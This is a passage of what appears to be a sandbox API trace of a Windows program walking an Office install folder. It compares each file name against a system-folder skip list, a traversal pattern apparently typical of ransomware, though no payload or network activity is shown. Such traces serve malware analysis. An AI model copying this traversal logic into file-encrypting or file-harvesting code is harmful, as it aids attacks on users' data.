(lpString1="MSOHTMED.EXE", lpString2="...") returned 1 [0137.035] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2="windows") returned -1 [0137.035] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2="recovery") returned -1 [0137.035] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2="perflogs") returned -1 [0137.035] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2="documents and settings") returned 1 [0137.035] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2="$RECYCLE.BIN") returned 1 [0137.035] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2="system volume information") returned -1 [0137.035] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2="msocache") returned 1 [0137.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOHTMED.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOHTMED.EXE", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOHTMED.EXE", lpUsedDefaultChar=0x0) returned 12 [0137.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOHTMED.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOHTMED.EXE", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOHTMED.EXE", lpUsedDefaultChar=0x0) returned 12 [0137.035] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1be16917, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c648aa6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x66250, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msoia.exe", cAlternateFileName="")) returned 1 [0137.035] lstrcmpiW (lpString1="msoia.exe", lpString2=".") returned 1 [0137.036] lstrcmpiW (lpString1="msoia.exe", lpString2="..") returned 1 [0137.036] lstrcmpiW (lpString1="msoia.exe", lpString2="...") returned 1 [0137.036] lstrcmpiW (lpString1="msoia.exe", lpString2="windows") returned -1 [0137.036] lstrcmpiW (lpString1="msoia.exe", lpString2="recovery") returned -1 [0137.036] lstrcmpiW (lpString1="msoia.exe", lpString2="perflogs") returned -1 [0137.036] lstrcmpiW (lpString1="msoia.exe", lpString2="documents and settings") returned 1 [0137.036] lstrcmpiW (lpString1="msoia.exe", lpString2="$RECYCLE.BIN") returned 1 [0137.036] lstrcmpiW (lpString1="msoia.exe", lpString2="system volume information") returned -1 [0137.036] lstrcmpiW (lpString1="msoia.exe", lpString2="msocache") returned 1 [0137.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoia.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoia.exe", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msoia.exe", lpUsedDefaultChar=0x0) returned 9 [0137.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoia.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoia.exe", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msoia.exe", lpUsedDefaultChar=0x0) returned 9 [0137.036] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1887f3e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5e80, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msoianetutil.dll", cAlternateFileName="MSOIAN~1.DLL")) returned 1 [0137.036] lstrcmpiW (lpString1="msoianetutil.dll", lpString2=".") returned 1 [0137.036] lstrcmpiW (lpString1="msoianetutil.dll", lpString2="..") returned 1 [0137.036] lstrcmpiW (lpString1="msoianetutil.dll", lpString2="...") returned 1 [0137.036] lstrcmpiW (lpString1="msoianetutil.dll", lpString2="windows") returned -1 [0137.036] lstrcmpiW (lpString1="msoianetutil.dll", lpString2="recovery") returned -1 [0137.036] lstrcmpiW (lpString1="msoianetutil.dll", lpString2="perflogs") returned -1 [0137.036] lstrcmpiW (lpString1="msoianetutil.dll", lpString2="documents and settings") returned 1 [0137.036] lstrcmpiW (lpString1="msoianetutil.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.036] lstrcmpiW (lpString1="msoianetutil.dll", lpString2="system volume information") returned -1 [0137.036] lstrcmpiW (lpString1="msoianetutil.dll", lpString2="msocache") returned 1 [0137.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoianetutil.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoianetutil.dll", cchWideChar=16, lpMultiByteStr=0x240fe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msoianetutil.dll", lpUsedDefaultChar=0x0) returned 16 [0137.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoianetutil.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoianetutil.dll", cchWideChar=16, lpMultiByteStr=0x2413d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msoianetutil.dll", lpUsedDefaultChar=0x0) returned 16 [0137.036] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2a8cc4b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2a8cc4b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2c30669, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x31ac0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOSB.DLL", cAlternateFileName="")) returned 1 [0137.036] lstrcmpiW (lpString1="MSOSB.DLL", lpString2=".") returned 1 [0137.036] lstrcmpiW (lpString1="MSOSB.DLL", lpString2="..") returned 1 [0137.037] lstrcmpiW (lpString1="MSOSB.DLL", lpString2="...") returned 1 [0137.037] lstrcmpiW (lpString1="MSOSB.DLL", lpString2="windows") returned -1 [0137.037] lstrcmpiW (lpString1="MSOSB.DLL", lpString2="recovery") returned -1 [0137.037] lstrcmpiW (lpString1="MSOSB.DLL", lpString2="perflogs") returned -1 [0137.037] lstrcmpiW (lpString1="MSOSB.DLL", lpString2="documents and settings") returned 1 [0137.037] lstrcmpiW (lpString1="MSOSB.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.037] lstrcmpiW (lpString1="MSOSB.DLL", lpString2="system volume information") returned -1 [0137.037] lstrcmpiW (lpString1="MSOSB.DLL", lpString2="msocache") returned 1 [0137.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSB.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSB.DLL", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOSB.DLL", lpUsedDefaultChar=0x0) returned 9 [0137.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSB.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSB.DLL", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOSB.DLL", lpUsedDefaultChar=0x0) returned 9 [0137.037] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x6081126, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x380c8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOSREC.EXE", cAlternateFileName="")) returned 1 [0137.037] lstrcmpiW (lpString1="MSOSREC.EXE", lpString2=".") returned 1 [0137.037] lstrcmpiW (lpString1="MSOSREC.EXE", lpString2="..") returned 1 [0137.037] lstrcmpiW (lpString1="MSOSREC.EXE", lpString2="...") returned 1 [0137.037] lstrcmpiW (lpString1="MSOSREC.EXE", lpString2="windows") returned -1 [0137.037] lstrcmpiW (lpString1="MSOSREC.EXE", lpString2="recovery") returned -1 [0137.037] lstrcmpiW (lpString1="MSOSREC.EXE", lpString2="perflogs") returned -1 [0137.037] lstrcmpiW (lpString1="MSOSREC.EXE", lpString2="documents and settings") returned 1 [0137.037] lstrcmpiW (lpString1="MSOSREC.EXE", lpString2="$RECYCLE.BIN") returned 1 [0137.037] lstrcmpiW (lpString1="MSOSREC.EXE", lpString2="system volume information") returned -1 [0137.037] lstrcmpiW (lpString1="MSOSREC.EXE", lpString2="msocache") returned 1 [0137.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSREC.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSREC.EXE", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOSREC.EXE", lpUsedDefaultChar=0x0) returned 11 [0137.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSREC.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSREC.EXE", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOSREC.EXE", lpUsedDefaultChar=0x0) returned 11 [0137.037] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb654e78, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc078, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOSTYLE.DLL", cAlternateFileName="")) returned 1 [0137.037] lstrcmpiW (lpString1="MSOSTYLE.DLL", lpString2=".") returned 1 [0137.037] lstrcmpiW (lpString1="MSOSTYLE.DLL", lpString2="..") returned 1 [0137.037] lstrcmpiW (lpString1="MSOSTYLE.DLL", lpString2="...") returned 1 [0137.037] lstrcmpiW (lpString1="MSOSTYLE.DLL", lpString2="windows") returned -1 [0137.037] lstrcmpiW (lpString1="MSOSTYLE.DLL", lpString2="recovery") returned -1 [0137.038] lstrcmpiW (lpString1="MSOSTYLE.DLL", lpString2="perflogs") returned -1 [0137.038] lstrcmpiW (lpString1="MSOSTYLE.DLL", lpString2="documents and settings") returned 1 [0137.038] lstrcmpiW (lpString1="MSOSTYLE.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.038] lstrcmpiW (lpString1="MSOSTYLE.DLL", lpString2="system volume information") returned -1 [0137.038] lstrcmpiW (lpString1="MSOSTYLE.DLL", lpString2="msocache") returned 1 [0137.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSTYLE.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSTYLE.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOSTYLE.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSTYLE.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSTYLE.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOSTYLE.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.038] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe1de33ea, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xef07151c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xef3deb63, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x74860, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOSYNC.EXE", cAlternateFileName="")) returned 1 [0137.038] lstrcmpiW (lpString1="MSOSYNC.EXE", lpString2=".") returned 1 [0137.038] lstrcmpiW (lpString1="MSOSYNC.EXE", lpString2="..") returned 1 [0137.038] lstrcmpiW (lpString1="MSOSYNC.EXE", lpString2="...") returned 1 [0137.038] lstrcmpiW (lpString1="MSOSYNC.EXE", lpString2="windows") returned -1 [0137.038] lstrcmpiW (lpString1="MSOSYNC.EXE", lpString2="recovery") returned -1 [0137.038] lstrcmpiW (lpString1="MSOSYNC.EXE", lpString2="perflogs") returned -1 [0137.038] lstrcmpiW (lpString1="MSOSYNC.EXE", lpString2="documents and settings") returned 1 [0137.038] lstrcmpiW (lpString1="MSOSYNC.EXE", lpString2="$RECYCLE.BIN") returned 1 [0137.038] lstrcmpiW (lpString1="MSOSYNC.EXE", lpString2="system volume information") returned -1 [0137.038] lstrcmpiW (lpString1="MSOSYNC.EXE", lpString2="msocache") returned 1 [0137.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSYNC.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSYNC.EXE", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOSYNC.EXE", lpUsedDefaultChar=0x0) returned 11 [0137.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSYNC.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSYNC.EXE", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOSYNC.EXE", lpUsedDefaultChar=0x0) returned 11 [0137.038] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed388c20, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed388c20, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed5eb1ce, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xac58, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msotd.exe", cAlternateFileName="")) returned 1 [0137.038] lstrcmpiW (lpString1="msotd.exe", lpString2=".") returned 1 [0137.038] lstrcmpiW (lpString1="msotd.exe", lpString2="..") returned 1 [0137.038] lstrcmpiW (lpString1="msotd.exe", lpString2="...") returned 1 [0137.038] lstrcmpiW (lpString1="msotd.exe", lpString2="windows") returned -1 [0137.038] lstrcmpiW (lpString1="msotd.exe", lpString2="recovery") returned -1 [0137.038] lstrcmpiW (lpString1="msotd.exe", lpString2="perflogs") returned -1 [0137.038] lstrcmpiW (lpString1="msotd.exe", lpString2="documents and settings") returned 1 [0137.038] lstrcmpiW (lpString1="msotd.exe", lpString2="$RECYCLE.BIN") returned 1 [0137.039] lstrcmpiW (lpString1="msotd.exe", lpString2="system volume information") returned -1 [0137.039] lstrcmpiW (lpString1="msotd.exe", lpString2="msocache") returned 1 [0137.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotd.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotd.exe", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msotd.exe", lpUsedDefaultChar=0x0) returned 9 [0137.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotd.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotd.exe", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msotd.exe", lpUsedDefaultChar=0x0) returned 9 [0137.039] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1bd7df5e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d0c8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msotdaddin.dll", cAlternateFileName="MSOTDA~1.DLL")) returned 1 [0137.039] lstrcmpiW (lpString1="msotdaddin.dll", lpString2=".") returned 1 [0137.039] lstrcmpiW (lpString1="msotdaddin.dll", lpString2="..") returned 1 [0137.039] lstrcmpiW (lpString1="msotdaddin.dll", lpString2="...") returned 1 [0137.039] lstrcmpiW (lpString1="msotdaddin.dll", lpString2="windows") returned -1 [0137.039] lstrcmpiW (lpString1="msotdaddin.dll", lpString2="recovery") returned -1 [0137.039] lstrcmpiW (lpString1="msotdaddin.dll", lpString2="perflogs") returned -1 [0137.039] lstrcmpiW (lpString1="msotdaddin.dll", lpString2="documents and settings") returned 1 [0137.039] lstrcmpiW (lpString1="msotdaddin.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.039] lstrcmpiW (lpString1="msotdaddin.dll", lpString2="system volume information") returned -1 [0137.039] lstrcmpiW (lpString1="msotdaddin.dll", lpString2="msocache") returned 1 [0137.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotdaddin.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotdaddin.dll", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msotdaddin.dll", lpUsedDefaultChar=0x0) returned 14 [0137.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotdaddin.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotdaddin.dll", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msotdaddin.dll", lpUsedDefaultChar=0x0) returned 14 [0137.039] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x16be2c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb860, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msotelemetry.dll", cAlternateFileName="MSOTEL~1.DLL")) returned 1 [0137.039] lstrcmpiW (lpString1="msotelemetry.dll", lpString2=".") returned 1 [0137.039] lstrcmpiW (lpString1="msotelemetry.dll", lpString2="..") returned 1 [0137.039] lstrcmpiW (lpString1="msotelemetry.dll", lpString2="...") returned 1 [0137.039] lstrcmpiW (lpString1="msotelemetry.dll", lpString2="windows") returned -1 [0137.039] lstrcmpiW (lpString1="msotelemetry.dll", lpString2="recovery") returned -1 [0137.039] lstrcmpiW (lpString1="msotelemetry.dll", lpString2="perflogs") returned -1 [0137.039] lstrcmpiW (lpString1="msotelemetry.dll", lpString2="documents and settings") returned 1 [0137.039] lstrcmpiW (lpString1="msotelemetry.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.039] lstrcmpiW (lpString1="msotelemetry.dll", lpString2="system volume information") returned -1 [0137.039] lstrcmpiW (lpString1="msotelemetry.dll", lpString2="msocache") returned 1 [0137.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotelemetry.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotelemetry.dll", cchWideChar=16, lpMultiByteStr=0x2412b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msotelemetry.dll", lpUsedDefaultChar=0x0) returned 16 [0137.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotelemetry.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotelemetry.dll", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msotelemetry.dll", lpUsedDefaultChar=0x0) returned 16 [0137.040] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe261555e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe261555e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2720687, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9be60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOUC.EXE", cAlternateFileName="")) returned 1 [0137.040] lstrcmpiW (lpString1="MSOUC.EXE", lpString2=".") returned 1 [0137.040] lstrcmpiW (lpString1="MSOUC.EXE", lpString2="..") returned 1 [0137.040] lstrcmpiW (lpString1="MSOUC.EXE", lpString2="...") returned 1 [0137.040] lstrcmpiW (lpString1="MSOUC.EXE", lpString2="windows") returned -1 [0137.040] lstrcmpiW (lpString1="MSOUC.EXE", lpString2="recovery") returned -1 [0137.040] lstrcmpiW (lpString1="MSOUC.EXE", lpString2="perflogs") returned -1 [0137.040] lstrcmpiW (lpString1="MSOUC.EXE", lpString2="documents and settings") returned 1 [0137.040] lstrcmpiW (lpString1="MSOUC.EXE", lpString2="$RECYCLE.BIN") returned 1 [0137.040] lstrcmpiW (lpString1="MSOUC.EXE", lpString2="system volume information") returned -1 [0137.040] lstrcmpiW (lpString1="MSOUC.EXE", lpString2="msocache") returned 1 [0137.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC.EXE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC.EXE", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC.EXE", lpUsedDefaultChar=0x0) returned 9 [0137.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC.EXE", cchWideChar=9, 